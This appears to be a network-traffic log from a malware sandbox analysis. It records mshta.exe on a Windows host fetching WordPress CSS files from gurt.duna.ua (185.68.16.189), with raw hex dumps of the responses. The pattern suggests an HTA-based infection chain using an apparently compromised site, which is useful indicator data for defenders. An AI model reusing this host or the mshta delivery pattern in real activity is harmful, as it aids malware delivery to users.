                                                                                                                                                                                          Date: Sun, 27 Oct 2024 06:35:15 GMT
                                                                                                                                                                                          Content-Type: text/css
                                                                                                                                                                                          Content-Length: 735
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Last-Modified: Sat, 19 Aug 2023 09:51:11 GMT
                                                                                                                                                                                          ETag: "64e0908f-2df"
                                                                                                                                                                                          x-ray: wnp447:0.000/wn447:0.000/
                                                                                                                                                                                          Expires: Sun, 03 Nov 2024 06:35:15 GMT
                                                                                                                                                                                          Cache-Control: max-age=604800
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-10-27 06:35:15 UTC735INData Raw: 2e 77 6f 6f 66 2d 73 64 2d 74 6f 6f 6c 74 69 70 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 7d 0a 0a 2e 77 6f 6f 66 2d 73 64 2d 74 6f 6f 6c 74 69 70 20 2e 77 6f 6f 66 2d 73 64 2d 74 6f 6f 6c 74 69 70 74 65 78 74 20 7b 0a 20 20 20 20 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 31 32 30 70 78 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 36 70 78 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 35 70 78 20 30 3b 0a 20 20 20 20 70 6f 73 69 74
                                                                                                                                                                                          Data Ascii: .woof-sd-tooltip { position: relative;}.woof-sd-tooltip .woof-sd-tooltiptext { visibility: hidden; min-width: 120px; background-color: black; color: #fff; text-align: center; border-radius: 6px; padding: 5px 0; posit


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          17192.168.2.449747185.68.16.1894437508C:\Windows\System32\mshta.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-10-27 06:35:16 UTC483OUTGET /wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/front.css?ver=1.3.4.2 HTTP/1.1
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2
                                                                                                                                                                                          Accept-Language: en-CH
                                                                                                                                                                                          UA-CPU: AMD64
                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                          Host: gurt.duna.ua
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          2024-10-27 06:35:16 UTC330INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                          Date: Sun, 27 Oct 2024 06:35:16 GMT
                                                                                                                                                                                          Content-Type: text/css
                                                                                                                                                                                          Content-Length: 483
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Last-Modified: Sat, 19 Aug 2023 09:51:11 GMT
                                                                                                                                                                                          ETag: "64e0908f-1e3"
                                                                                                                                                                                          x-ray: wnp447:0.000/wn447:0.000/
                                                                                                                                                                                          Expires: Sun, 03 Nov 2024 06:35:16 GMT
                                                                                                                                                                                          Cache-Control: max-age=604800
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-10-27 06:35:16 UTC483INData Raw: 2e 77 6f 6f 66 5f 6c 69 73 74 5f 73 64 20 2e 77 6f 6f 66 5f 6f 70 65 6e 5f 68 69 64 64 65 6e 5f 6c 69 7b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 7d 0a 0a 2e 77 6f 6f 66 2d 73 64 2d 69 65 20 2e 77 6f 6f 66 2d 73 64 2d 69 65 2d 63 6f 75 6e 74 3a 65 6d 70 74 79 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 0a 2e 77 6f 6f 66 2d 73 64 2d 69 65 20 2e 77 6f 6f 66 2d 73 64 2d 6c 69 73 74 2d 6f 70 65 6e 65 72 7b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 3b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 74 6f 70 3a 20 2d 31 70 78 3b 0a 7d 0a 0a 2e 77 6f 6f 66 2d 73 64 2d 69 65 20 77 6f 6f 66 2d 73 64 2d 6c 69 73 74 2d 6f 70 65 6e 65 72 7b 0a
                                                                                                                                                                                          Data Ascii: .woof_list_sd .woof_open_hidden_li{ width: 100%;}.woof-sd-ie .woof-sd-ie-count:empty{ display: none !important;}.woof-sd-ie .woof-sd-list-opener{ line-height: 0; position: relative; top: -1px;}.woof-sd-ie woof-sd-list-opener{


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          18192.168.2.449748185.68.16.1894437508C:\Windows\System32\mshta.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-10-27 06:35:16 UTC473OUTGET /wp-content/plugins/woo-discount-rules/v2/Assets/Css/customize-table.css?ver=2.3.8 HTTP/1.1
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2
                                                                                                                                                                                          Accept-Language: en-CH
                                                                                                                                                                                          UA-CPU: AMD64
                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                          Host: gurt.duna.ua
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          2024-10-27 06:35:16 UTC328INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                          Date: Sun, 27 Oct 2024 06:35:16 GMT
                                                                                                                                                                                          Content-Type: text/css
                                                                                                                                                                                          Content-Length: 89
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Last-Modified: Fri, 10 Sep 2021 13:16:34 GMT
                                                                                                                                                                                          ETag: "613b5ab2-59"
                                                                                                                                                                                          x-ray: wnp447:0.000/wn447:0.000/
                                                                                                                                                                                          Expires: Sun, 03 Nov 2024 06:35:16 GMT
                                                                                                                                                                                          Cache-Control: max-age=604800
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-10-27 06:35:16 UTC89INData Raw: 2e 61 77 64 72 5f 64 69 73 63 6f 75 6e 74 5f 62 61 72 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 7d
                                                                                                                                                                                          Data Ascii: .awdr_discount_bar{ padding: 10px; margin-bottom: 10px; border-radius: 4px;}


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          19192.168.2.449749185.68.16.1894437508C:\Windows\System32\mshta.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-10-27 06:35:17 UTC467OUTGET /wp-content/plugins/woocommerce-products-filter/css/switcher.css?ver=1.3.4.2 HTTP/1.1
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2
                                                                                                                                                                                          Accept-Language: en-CH
                                                                                                                                                                                          UA-CPU: AMD64
                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                          Host: gurt.duna.ua
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          2024-10-27 06:35:17 UTC332INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                          Date: Sun, 27 Oct 2024 06:35:17 GMT
                                                                                                                                                                                          Content-Type: text/css
                                                                                                                                                                                          Content-Length: 4289
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Last-Modified: Sat, 19 Aug 2023 09:51:11 GMT
                                                                                                                                                                                          ETag: "64e0908f-10c1"
                                                                                                                                                                                          x-ray: wnp447:0.000/wn447:0.000/
                                                                                                                                                                                          Expires: Sun, 03 Nov 2024 06:35:17 GMT
                                                                                                                                                                                          Cache-Control: max-age=604800
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-10-27 06:35:17 UTC4289INData Raw: 3a 72 6f 6f 74 20 7b 0d 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 76 65 72 74 65 78 5f 65 6e 61 62 6c 65 64 5f 62 67 5f 63 6f 6c 6f 72 3a 20 23 37 39 62 38 66 66 3b 0d 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 73 75 62 73 74 72 61 74 65 5f 65 6e 61 62 6c 65 64 5f 62 67 5f 63 6f 6c 6f 72 3a 20 23 63 38 65 31 66 66 3b 0d 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 76 65 72 74 65 78 5f 64 69 73 61 62 6c 65 64 5f 62 67 5f 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 73 75 62 73 74 72 61 74 65 5f 64 69 73 61 62 6c 65 64 5f 62 67 5f 63 6f 6c 6f 72 3a 20 23 39 61 39 39 39 39 3b 0d 0a 20 20 20 20 2d 2d 77 6f 6f 66 2d 73 64 2d 69 65 2d 76 65 72 74 65 78 5f 73 69 7a 65 3a 20
                                                                                                                                                                                          Data Ascii: :root { --woof-sd-ie-vertex_enabled_bg_color: #79b8ff; --woof-sd-ie-substrate_enabled_bg_color: #c8e1ff; --woof-sd-ie-vertex_disabled_bg_color: #ffffff; --woof-sd-ie-substrate_disabled_bg_color: #9a9999; --woof-sd-ie-vertex_size:


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          20192.168.2.449750185.68.16.1894437508C:\Windows\System32\mshta.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-10-27 06:35:17 UTC453OUTGET /wp-content/themes/flatsome/assets/css/flatsome.css?ver=3.17.5 HTTP/1.1
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2
                                                                                                                                                                                          Accept-Language: en-CH
                                                                                                                                                                                          UA-CPU: AMD64
                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                          Host: gurt.duna.ua
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          2024-10-27 06:35:18 UTC335INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                          Date: Sun, 27 Oct 2024 06:35:17 GMT
                                                                                                                                                                                          Content-Type: text/css
                                                                                                                                                                                          Content-Length: 145954
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Last-Modified: Sat, 19 Aug 2023 09:50:41 GMT
                                                                                                                                                                                          ETag: "64e09071-23a22"
                                                                                                                                                                                          x-ray: wnp447:0.000/wn447:0.000/
                                                                                                                                                                                          Expires: Sun, 03 Nov 2024 06:35:17 GMT
                                                                                                                                                                                          Cache-Control: max-age=604800
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-10-27 06:35:18 UTC16049INData Raw: 40 63 68 61 72 73 65 74 20 22 75 74 66 2d 38 22 3b 68 74 6d 6c 7b 2d 6d 73 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 7d 61 72 74 69 63 6c 65 2c 61 73 69 64 65 2c 64 65 74 61 69 6c 73 2c 66 69 67 63 61 70 74 69 6f 6e 2c 66 69 67 75 72 65 2c 66 6f 6f 74 65 72 2c 68 65 61 64 65 72 2c 6d 61 69 6e 2c 6d 65 6e 75 2c 6e 61 76 2c 73 65 63 74 69 6f 6e 2c 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 61 75 64 69 6f 2c 63 61 6e 76 61 73 2c 70 72 6f 67 72 65 73 73 2c 76 69 64 65 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65
                                                                                                                                                                                          Data Ascii: @charset "utf-8";html{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%;font-family:sans-serif}body{margin:0}article,aside,details,figcaption,figure,footer,header,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline
                                                                                                                                                                                          2024-10-27 06:35:18 UTC16384INData Raw: 75 6d 6e 20 6c 69 3e 61 2c 2e 6e 61 76 2d 64 72 6f 70 64 6f 77 6e 3e 6c 69 3e 61 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 33 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 20 32 30 70 78 3b 77 69 64 74 68 3a 61 75 74 6f 7d 2e 6e 61 76 2d 63 6f 6c 75 6d 6e 3e 6c 69 3a 6c 61 73 74 2d 63 68 69 6c 64 3a 6e 6f 74 28 2e 6e 61 76 2d 64 72 6f 70 64 6f 77 6e 2d 63 6f 6c 29 3e 61 2c 2e 6e 61 76 2d 64 72 6f 70 64 6f 77 6e 3e 6c 69 3a 6c 61 73 74 2d 63 68 69 6c 64 3a 6e 6f 74 28 2e 6e 61 76 2d 64 72 6f 70 64 6f 77 6e 2d 63 6f 6c 29 3e 61 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 64 72 6f 70 64 6f 77 6e 2d 75 70 70 65 72 63 61 73 65 2e 6e 61 76 2d 64 72 6f 70 64 6f 77 6e 20 2e 6e 61 76 2d
                                                                                                                                                                                          Data Ascii: umn li>a,.nav-dropdown>li>a{display:block;line-height:1.3;padding:10px 20px;width:auto}.nav-column>li:last-child:not(.nav-dropdown-col)>a,.nav-dropdown>li:last-child:not(.nav-dropdown-col)>a{border-bottom:0!important}.dropdown-uppercase.nav-dropdown .nav-
                                                                                                                                                                                          2024-10-27 06:35:18 UTC16384INData Raw: 3e 6c 69 2b 6c 69 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25 2c 2e 32 29 7d 2e 6e 61 76 2d 76 65 72 74 69 63 61 6c 3e 6c 69 2b 6c 69 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 65 63 65 63 65 63 7d 2e 6e 61 76 2d 76 65 72 74 69 63 61 6c 2d 66 6c 79 2d 6f 75 74 3e 6c 69 2b 6c 69 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 65 63 65 63 65 63 7d 2e 6e 61 76 2d 76 65 72 74 69 63 61 6c 2e 6e 61 76 2d 6c 69 6e 65 3e 6c 69 3e 61 3a 62 65 66 6f 72 65 7b 68 65 69 67 68 74 3a 31 30 30 25 3b 6c 65 66 74 3a 61 75 74 6f 3b 72 69 67 68 74 3a 2d 32 70 78 3b 77 69 64 74 68 3a 33 70 78 3b 7a 2d 69 6e 64 65 78 3a 31 7d 2e 6e 61 76 2d 76 65 72 74 69 63 61 6c 2e 6e 61 76 2d 74 61 62 73 3e 6c 69 3e 61 7b 62 6f
                                                                                                                                                                                          Data Ascii: >li+li{border-color:hsla(0,0%,100%,.2)}.nav-vertical>li+li{border-top:1px solid #ececec}.nav-vertical-fly-out>li+li{border-color:#ececec}.nav-vertical.nav-line>li>a:before{height:100%;left:auto;right:-2px;width:3px;z-index:1}.nav-vertical.nav-tabs>li>a{bo
                                                                                                                                                                                          2024-10-27 06:35:18 UTC16384INData Raw: 30 32 29 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 2e 34 65 6d 7d 2e 73 65 6c 65 63 74 2d 72 65 73 69 7a 65 2d 67 68 6f 73 74 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6f 70 61 63 69 74 79 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 69 64 74 68 3a 61 75 74 6f 7d 73 65 6c 65 63 74 2e 72 65 73 69 7a 65 2d 73 65 6c 65 63 74 7b 77 69 64 74 68 3a 35 35 70 78 7d 2e 73 65 6c 65 63 74 32 2d 73 65 6c 65 63 74 69 6f 6e 5f 5f 61 72 72 6f 77 20 62 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 73 65 6c 65 63 74 32 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 73 65 6c 65 63 74 69 6f 6e 20 2e 73 65 6c 65 63 74 32 2d 73 65
                                                                                                                                                                                          Data Ascii: 02);display:block;padding-right:1.4em}.select-resize-ghost{display:inline-block;opacity:0;position:absolute;width:auto}select.resize-select{width:55px}.select2-selection__arrow b{border-color:transparent!important}.select2-container .selection .select2-se
                                                                                                                                                                                          2024-10-27 06:35:18 UTC16384INData Raw: 69 67 68 74 3a 30 7d 2e 6d 66 70 2d 69 6d 67 2d 6d 6f 62 69 6c 65 20 69 6d 67 2e 6d 66 70 2d 69 6d 67 7b 70 61 64 64 69 6e 67 3a 30 7d 2e 6d 66 70 2d 69 6d 67 2d 6d 6f 62 69 6c 65 20 2e 6d 66 70 2d 66 69 67 75 72 65 3a 61 66 74 65 72 7b 62 6f 74 74 6f 6d 3a 30 3b 74 6f 70 3a 30 7d 2e 6d 66 70 2d 69 6d 67 2d 6d 6f 62 69 6c 65 20 2e 6d 66 70 2d 66 69 67 75 72 65 20 73 6d 61 6c 6c 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 35 70 78 7d 2e 6d 66 70 2d 69 6d 67 2d 6d 6f 62 69 6c 65 20 2e 6d 66 70 2d 62 6f 74 74 6f 6d 2d 62 61 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 36 29 3b 62 6f 74 74 6f 6d 3a 30 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a
                                                                                                                                                                                          Data Ascii: ight:0}.mfp-img-mobile img.mfp-img{padding:0}.mfp-img-mobile .mfp-figure:after{bottom:0;top:0}.mfp-img-mobile .mfp-figure small{display:inline;margin-left:5px}.mfp-img-mobile .mfp-bottom-bar{background:rgba(0,0,0,.6);bottom:0;box-sizing:border-box;margin:
                                                                                                                                                                                          2024-10-27 06:35:18 UTC16384INData Raw: 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 31 30 30 25 20 31 30 30 25 3b 62 6f 74 74 6f 6d 3a 2d 36 70 78 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6c 65 66 74 3a 2d 31 30 25 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 72 69 67 68 74 3a 2d 31 30 25 3b 7a 2d 69 6e 64 65 78 3a 2d 32 7d 2e 73 6c 69 64 65 72 2d 73 74 79 6c 65 2d 73 68 61 64 6f 77 20 2e 66 6c 69 63 6b 69 74 79 2d 73 6c 69 64 65 72 3e 3a 6e 6f 74 28 2e 69 73 2d 73 65 6c 65 63 74 65 64 29 7b 6f 70 61 63 69 74 79 3a 31 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 2e 39 29 3b 7a 2d 69 6e 64 65 78 3a 2d 31 7d 2e 73 6c 69 64 65 72 2d 73 74 79 6c 65 2d 73 68 61 64 6f 77 20 2e 66 6c 69 63 6b 69 74 79 2d 73 6c 69 64 65 72 3e 3a 6e 6f 74 28 2e
                                                                                                                                                                                          Data Ascii: ;background-size:100% 100%;bottom:-6px;content:"";height:100px;left:-10%;position:absolute;right:-10%;z-index:-2}.slider-style-shadow .flickity-slider>:not(.is-selected){opacity:1;transform:scale(.9);z-index:-1}.slider-style-shadow .flickity-slider>:not(.
                                                                                                                                                                                          2024-10-27 06:35:18 UTC16384INData Raw: 69 7a 65 3a 38 2e 35 70 78 7d 2e 73 6d 61 6c 6c 2d 35 20 2e 72 65 73 2d 74 65 78 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 39 70 78 7d 2e 73 6d 61 6c 6c 2d 36 20 2e 72 65 73 2d 74 65 78 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 7d 2e 73 6d 61 6c 6c 2d 37 20 2e 72 65 73 2d 74 65 78 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 78 7d 2e 73 6d 61 6c 6c 2d 38 20 2e 72 65 73 2d 74 65 78 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 7d 2e 73 6d 61 6c 6c 2d 39 20 2e 72 65 73 2d 74 65 78 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 7d 2e 73 6d 61 6c 6c 2d 31 30 20 2e 72 65 73 2d 74 65 78 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 2e 73 6d 61 6c 6c 2d 31 31 20 2e 72 65 73 2d 74 65 78 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 7d 40 6d 65 64 69 61
                                                                                                                                                                                          Data Ascii: ize:8.5px}.small-5 .res-text{font-size:9px}.small-6 .res-text{font-size:10px}.small-7 .res-text{font-size:11px}.small-8 .res-text{font-size:12px}.small-9 .res-text{font-size:13px}.small-10 .res-text{font-size:14px}.small-11 .res-text{font-size:15px}@media
                                                                                                                                                                                          2024-10-27 06:35:18 UTC16384INData Raw: 72 2d 73 69 64 65 74 69 70 2e 74 6f 6f 6c 74 69 70 73 74 65 72 2d 64 65 66 61 75 6c 74 2e 74 6f 6f 6c 74 69 70 73 74 65 72 2d 74 6f 70 20 2e 74 6f 6f 6c 74 69 70 73 74 65 72 2d 61 72 72 6f 77 7b 62 6f 74 74 6f 6d 3a 30 3b 68 65 69 67 68 74 3a 38 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 38 70 78 3b 77 69 64 74 68 3a 31 36 70 78 7d 2e 74 6f 6f 6c 74 69 70 73 74 65 72 2d 73 69 64 65 74 69 70 2e 74 6f 6f 6c 74 69 70 73 74 65 72 2d 64 65 66 61 75 6c 74 20 2e 74 6f 6f 6c 74 69 70 73 74 65 72 2d 61 72 72 6f 77 2d 62 61 63 6b 67 72 6f 75 6e 64 2c 2e 74 6f 6f 6c 74 69 70 73 74 65 72 2d 73 69 64 65 74 69 70 2e 74 6f 6f 6c 74 69 70 73 74 65 72 2d 64 65 66 61 75 6c 74 20 2e 74 6f 6f 6c 74 69 70 73 74 65 72 2d 61 72 72 6f 77 2d 62 6f 72 64 65 72 7b 68 65 69 67
                                                                                                                                                                                          Data Ascii: r-sidetip.tooltipster-default.tooltipster-top .tooltipster-arrow{bottom:0;height:8px;margin-left:-8px;width:16px}.tooltipster-sidetip.tooltipster-default .tooltipster-arrow-background,.tooltipster-sidetip.tooltipster-default .tooltipster-arrow-border{heig
                                                                                                                                                                                          2024-10-27 06:35:19 UTC15217INData Raw: 34 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 65 72 3b 6d 61 72 67 69 6e 3a 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 75 70 70 65 72 63 61 73 65 7d 2e 6c 6f 67 6f 20 69 6d 67 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 61 75 74 6f 7d 2e 68 65 61 64 65 72 2d 6c 6f 67 6f 2d 64 61 72 6b 2c 2e 68 65 61 64 65 72 2d 6c 6f 67 6f 2d 73 74 69 63 6b 79 2c 2e 6e 61 76 2d 64 61 72 6b 20 2e 68 65 61 64 65 72 2d 6c 6f 67 6f 2c 2e 73 74 69 63 6b 79 20 2e 64 61 72 6b 20 2e 68 65 61 64 65 72 2d 6c 6f 67 6f 2d 64 61 72 6b 2c 2e 73 74 69 63 6b 79 20 2e 68 61 73 2d 73 74 69 63 6b 79 2d 6c 6f
                                                                                                                                                                                          Data Ascii: 4;display:block;font-size:32px;font-weight:bolder;margin:0;text-decoration:none;text-transform:uppercase}.logo img{display:block;width:auto}.header-logo-dark,.header-logo-sticky,.nav-dark .header-logo,.sticky .dark .header-logo-dark,.sticky .has-sticky-lo


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          21192.168.2.449752185.68.16.1894437508C:\Windows\System32\mshta.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-10-27 06:35:18 UTC469OUTGET /wp-content/plugins/woo-discount-rules-pro/Assets/Css/awdr_style.css?ver=2.3.7 HTTP/1.1
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2
                                                                                                                                                                                          Accept-Language: en-CH
                                                                                                                                                                                          UA-CPU: AMD64
                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                          Host: gurt.duna.ua
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          2024-10-27 06:35:18 UTC331INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                          Date: Sun, 27 Oct 2024 06:35:18 GMT
                                                                                                                                                                                          Content-Type: text/css
                                                                                                                                                                                          Content-Length: 1143
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Last-Modified: Fri, 16 Jul 2021 08:06:48 GMT
                                                                                                                                                                                          ETag: "60f13e18-477"
                                                                                                                                                                                          x-ray: wnp447:0.010/wn447:0.000/
                                                                                                                                                                                          Expires: Sun, 03 Nov 2024 06:35:18 GMT
                                                                                                                                                                                          Cache-Control: max-age=604800
                                                                                                                                                                                          Accept-Ranges: bytes
